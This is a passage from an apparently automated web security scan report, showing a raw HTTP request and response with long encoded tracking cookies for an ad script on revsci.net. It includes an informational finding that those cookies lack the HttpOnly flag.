ZdeKXavQyII7tmlRVEFNg8fL/UvHE8Po5Az2wwSQw9p5ykXzXd6oQzeqkE6ulGDIBZXasEj/HKEsZInx3zLzEdqUPXlbaYmGq8vCPXrHY3MrtU0j+Ot4sIH2bV5ST8uO8sKhrffUc9zAJDWp9Td57AqE2XM2JJodGQEcT9qj5CdyCaUy5CFvWpeKR6NZChYRdUe1VhBHqvpAUuXI5+OksjNLASv2gljDCH/86fdDTRIZ86/Ywie9+EkqD/IqTMw1Fy9viFb1zLLKJQ5ym/tNQy8rK1zajO/dfc5gDUeNGDVKnHV/D0CTGlUqVmb0Iz1L/9UACYTzVibMQjj1NJRC/1omsUu9lAB9Dc6tgUEICxHD9sfQ3o3BQu/I6chgQagGvEexh0/C4rsqGS//22odQ0EPx5WuDKOGI9To0hSqu0TcDdNm8c5GBdzU5riw4cBVUVG8YVE6/I0IdYXIq1gWTPOZOkfn6Kc45yqJI5gPy8UB4yNOM8Ff+iTACg=="; udm_0=MLv3NCEpbgpn34xwb+t4i0a3cgXtVLCla0EkErcT0mFBLMnR0C8SwiSd9pwq6b/urQy6uwL5rPtS5VxWx3Av+lIK0Lkpaj4N0MO2DnhUU4jP9xhTmoHoo0Y+f+q8hN+oFLyOmbud0hz+jq+cMwoghUynYwrgNtd+Agap/FTLc7CKGnJlB+2sP1urgbhTgD8dotZ4m56OVucAdbLbNgNMDtOQq9gJGEepfG8VW1Q9a5rIwEWo6XIMCluZo5KWK7KJpXdKAuMdT0asQPYcVvVrO2UUzxrvO5ZVIHEgPywOJ5do5WC2Q0/NcF2shDO+QqXWJdbX0OqMCfCp/uF1DI8mTtMKSOzEDgZLk+53ghmHpNlezwaRq24n3yk1axI/i4b0N9csYVpsaAUU4uyKMoWlj00kD3c2UwUiXRlylO9GVaUWDOdxl1h2tF635L8pmba2LwiVetWos0VrtRJlUmO1ehLqwSW4EKEEcT1d1To6b4bDwQqyboO20/CC91ImnZSY7f4dk+Fkg0a/iqt7HSzUf2P/bKQuLhMJR4Knq3s8RacbfTWCuKlYBEJAz+C2bkNJqUf4oZaeXZGWBH99QC8Kq3iPoMvS6/eEAZXXF25Cc5tiWi6bvIzGGduB4chYRZXmCwczXutrmI0mdYim/t0EiV3MiddLLCiwPdaARbD+dleQ7aYZZc0IWJDrUAUoqq6BNFHqZQOaoMq0c2Vdvfoyq2gE65uykjGK8DI0fQ6W0LZV/KMW+bsDCKsOfz+Ch73anSmjzQ4N2mtfQACJzfk9EWBNM9K5yTbQDP/ZDJ/8zYyErcuaX/MTs1RU5N5DeU0aAmkpYJ9thW/Hya0qFvYladCiAuWtUPOrqpcyHKJPhFT9S9HCVHVMj3nZyx0z/91FO96gSu1bjwC1k54v0ek3ge3GY4Tosdejf4GUDkRMDeGtP/O/P23UhOcwcG29rPMIxD0imB5ApBEJHRsYN43ewlfT9vlcTTPx3Qihj66o/Chm4BPtAk9t25PfQLvbLkRSsruCX9+OdKjyYq+SzvBRWlhHPO8ZSqSXntrC0QOntJkQEIKIuYAC6+qY93TunGvCP99YcUu3CJVkmsbYN+Z5/84Q1V3ByyguogZxtBkUNrBOObpCkTAXnHmtBZu5Kqm7rHy9fTkErq2IhUY1YJqszajUzu0pnqOVrr8jTIo2TEJtgt3BdnvhPEhCLoK/tNiYa8XArAO/qbLAzFHFwe3eti49gHeYkMoRyy6gVrH5qdgFcqa0YlQJiQ8XgE2XCYqnJsDnGrEFxVz5s8Y6t369w9ih76FWbImv5nAazRPQE+R15Ge7Ar1R2tkE7fuLhxj0De9ywsX84Hqjq0nGEK4HZczwHAWH7HMyIqhm4sGgPjSpwGvB8dhrk2yXb7nG3qYnMLWeIXiuyNlCi5rjvnpEfQBOFLGvK9HN8srFj0xIopOeHeqR+QvHGiHzBpPF

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_gxm3=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_5Dmj=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rtc_2rEO=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4zOheXIMH/C1v6FY5Pio22rQpqLOQoPYd+GAD9VybyI+F4QNbwPPyvr8UGBZ6Vjnvedz63aa7pnxc5JCqQR+k2XOvNLfrCxC41VqqLiodbQjQZqBJei4H2TQvkinqMG8kBtM1kg38//fE0fhbl4QK/GL4tvC3vzfaUVMGHcMdGNMZDiIp4XW2dfAgHAn0AB43JJkmIRNHpWmlV7EGVMQOAUZTY3DQWOclImVvDGQzJdNDr9N803R6yNbqW2d3xDmBVK5G8Y5QNpT84suIacDxFRWhiYiXxb6RcnJUO2n/LXfOLncVWRHBhWNCNIPk4gU4G3WJWfrTzaR0w/9p8kAZYw/qSf0HduMZyRYt6LR1bdMVxUQzgDYC/ga7q1aqSAbYdYG+o469SYWL9OMk8vxEHcb637CHu1UrWG39L+tr8mGcL7imea6BA9t/9jx6c5vIunljkjwSkw7oZE6c9cxHJE3u6ZSqe5K7ULm42XLRCJg12GrcbV5R4Evkk8Eh3y8428t+dZDhkKZQfs6pQGSlwp/5wH0C/76A2MS1Et9/oXJ3c2aaIwXyMJ257RRIFcfpL1U2s4woUYUay7tTLmnBowyx/SmoO5VF7gHr3EqVITLWizD+JwSwrv3jkfgWAvJMCSFEmiAl6KPZbHNG37jgXCVku1jpFl4dQ8nZk9rn2v9l3cmZ2Ze33QfideBivuvdgt2Q0Ajm7NbHTt27ZRnHqp2Ze2QrczWEeEx7EO+FRH1TYLkFj7bxPfWgnX9H/Az/z5Qgw==; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/
Set-Cookie: rtc_dIjc=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; Domain=.revsci.net; Expires=Wed, 18-Jul-2012 16:02:35 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:34 GMT
Content-Length: 886

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
rsinetsegs=['D08734_70056','D08734_70065','C07583_10165','C07583_10166','C07583_10174'];
var rsiExp=new Date((new Date()).getTime()+2419200000);
va
...[SNIP]...

14.97. http://pix04.revsci.net/D08734/a1/0/3/0.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /D08734/a1/0/3/0.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /D08734/a1/0/3/0.js?D=DM_LOC%3Dhttp%253A%252F%252Fti.com%253Fscore%253D000%2526zip%253D%2526byear1%253D%2526sex1%253D%2526ts1%253D%2526byear2%253D%2526sex2%253D%2526ts2%253D HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; rsi_segs_1000000=pUP94z+henIMH/C100a+jhgB5JQz9IY1FIa6Tm94OcJbus0+9LWt9uNg2v/oPlIcMX++9Sai/up6K4JoYxbTJtjJw67a4dAyP1rLMPPNf8+aF3KjorlwYWigFiDN8HXuymtY/8mZrBaVwjk7jhzQieeyWjePC1nNMnF9Uq187o0DW0axE8uqS+hiEBYEcYeIaWufeMRzQ6AsLOgLXVuWTOVKjAyo4BqcItT4EdQfOFZpvT8JVAHJxLHxEq4chk84g4aQoKIFE6nbu8sHtv1wbn3dcIDjQl2ic2FultsytuTkiR8SRG4+2iN1NXX+i0matqTYj7ODk66zO+jFqknjKVZxPOIXk76IkPIxfvvZuK1QWi4m8F6FSICsQJ6qcOpvHuzJZo3ZqJ2CI1FMCRsapDA5ww6SKOXpA7HkpaxvDhDNOdvuDJNcOusnbDWRzfdDrAZDP4Z6GarUTuVkOmtXCN0NyrpfnBl14Zdjh+QfP/OUpkYzsCBTbfmLykQ2f+NeLSQRx1lb+SuWvDX8zCU9cEELiQ5gA9zC2Coux7awYbO3fx80EFhxIsNcnWqm39A+9ZVe60O4/7iLv1qaXAXdlPAsw9x8hNmk2rJqahfB+k4pYuU+hwIZv7XvryMqavNb6aayfAhfD2UZqJUDEiDIcMbDb88AyjODp7s1s72qQuXfQeclkV3aMfapt78a+7vev0IzfhU8PmWD2U2IbXN87zTV4qfnhfQCyhq5V3SUTsBa44CpYg9FbhfNknZM3bSBKOlpqx6I7+qkHbCT9pdIDN8IHKTcWqzP; rtc_gxm3=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; rsiPus_kpxr="MLsXtSUNZzhvJpH4+tKkOoj8ntlBfYhpEw27Sgdm26iivu1jMXrkolpihGBj4llhxoQ3etX0vIp6oTU6utPqiiY+q0sx9SZq3j9cxNBBOTGkTUzMMcfOycMr/RCdSAZbrYe7MR41Ml8P0TCrYF9UtXf6D83ChO020avNadiJ0sMNIxbXO9TZCAjf/B0U1QBTGISffV1CXeQy/Q9+Vsi1tAFjh63CWoW7lbQ1X+MM22FfbwuxngshaR0fwX/fD4W+yJj7/VWRRLYCYuhPcnKafgAst0jtLE2+Wf8kEa39J7+bN6XUByr7MX11X+aNOsJpqBYZU+6PWTFj0xxCVlJeC0H2nJ8/7vjk0U1lqVwFbfETfD25gPv0d2qBQfqzxSyR+jgdm/cye29eCnCatgRbhuRHomyUj/leb0nNtKuAIULlNeYV/gmjkZRDcj2uROQpryf7ex2bihe1gZSbYjZNrhak7q1+6hKGf6HOuM/baUhUMxe9/tF5Y7253PUv1YhZo6/80WO1vvW1yOobrIxtrdxXgDTiEkg+JHfmGdJbdNjWTnDSlwdtk9aL5TM6m74RiKi5XGC4b7u3yJT5S/AuvvgRBAHbAPCRCK6AyIFM5sL/76HM3rAmJoxjITkzacdFyI2MsH461K6ogE96hFMGAQZ58FhBsueAh9zwYYTa4WE0uj14mgUez3U4OO3OIBsNSmwdDAzjJ/LfTVWJC0KbxQF4wTVviqKj2hgaE6Oh1pzLmPv1EL8bTJnB5xiMHUgesx7wqtKQ2fl5o6PFAQUIvzdGkYBnEpNfDYz+FLWjKYxhb6ZL1MiU+aDmtXvtg8HZ6ghqHQjD4aMO749hTnc8Y8YtOlKc1IK2PtzGq1oxPJ+7weDGtjC/tKJdZpuH37zztp7oTkZEVNlv8T0JmM4AY/tYnhVf1cMLlDd5sX8/VYGbrkqKt2epyPZXnM+u9sfu2KuFOSd6D987kxMpi9vpw7N2CXi/3bTpgQc98nIcQMfUMKPt7BLH/F92yTjQDu2+2r2xLec53j0aQPOtjOXx1wU03jNtASF4RMjKkRQTgtaMp7PYKzNktZ787iF1qnjt0JA+LKNZx8cGOwgkQkSA/1plqde04kE3cfFRfHiVAtvEb4Oyv8pDUPkVjJMP1El6/XVauEAQmHKrURNiy1/1HwVGsfUASmo0Yjw+DOURA8j7F87INyrKpWwx+gz9OaG5yKVgeO/oeTiahjHeqtdGAhjT/bBR3JjQxhIBejVRTjc7RBl/shL4DEPlMvPoIzR5PfzKBQg082EG+cx7sYQApbog7ugl+RbMx+2KF9v8Wm1LHfB6q02BJzThLXcpT3ecL5eqrCxf6uaSDZmvhAFXF6m4KOc1Vua0Y1O4l0hu8D7f6De2oBu+ULi1otwrO4Z8ImdH+xwHPSk18RmJBfTJqO1PetNV/rVZYuNoP0D6Vb4FTPdGqt63p5RwNgUMCeHJBmWFWYrt8arKwK5zd6HeIeQ1ADg4yO2ij1GRKOLEWt6pBlZLuCqPm0OvD8LoqWoWOE31dSCyZXRyBXBgcY77tFuSLo7cjSu7M3YR"; rsi_us_1000000="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"; udm_0=MLv3NCEpbgpn34xwb+t4i0a3cgXtVLCla0EkErcT0mFBLMnR0C8SwiSd9pwq6b/urQy6uwL5rPtS5VxWx3Av+lIK0Lkpaj4N0MO2DnhUU4jP9xhTmoHoo0Y+f+q8hN+oFLyOmbud0hz+jq+cMwoghUynYwrgNtd+Agap/FTLc7CKGnJlB+2sP1urgbhTgD8dotZ4m56OVucAdbLbNgNMDtOQq9gJGEepfG8VW1Q9a5rIwEWo6XIMCluZo5KWK7KJpXdKAuMdT0asQPYcVvVrO2UUzxrvO5ZVIHEgPywOJ5do5WC2Q0/NcF2shDO+QqXWJdbX0OqMCfCp/uF1DI8mTtMKSOzEDgZLk+53ghmHpNlezwaRq24n3yk1axI/i4b0N9csYVpsaAUU4uyKMoWlj00kD3c2UwUiXRlylO9GVaUWDOdxl1h2tF635L8pmba2LwiVetWos0VrtRJlUmO1ehLqwSW4EKEEcT1d1To6b4bDwQqyboO20/CC91ImnZSY7f4dk+Fkg0a/iqt7HSzUf2P/bKQuLhMJR4Knq3s8RacbfTWCuKlYBEJAz+C2bkNJqUf4oZaeXZGWBH99QC8Kq3iPoMvS6/eEAZXXF25Cc5tiWi6bvIzGGduB4chYRZXmCwczXutrmI0mdYim/t0EiV3MiddLLCiwPdaARbD+dleQ7aYZZc0IWJDrUAUoqq6BNFHqZQOaoMq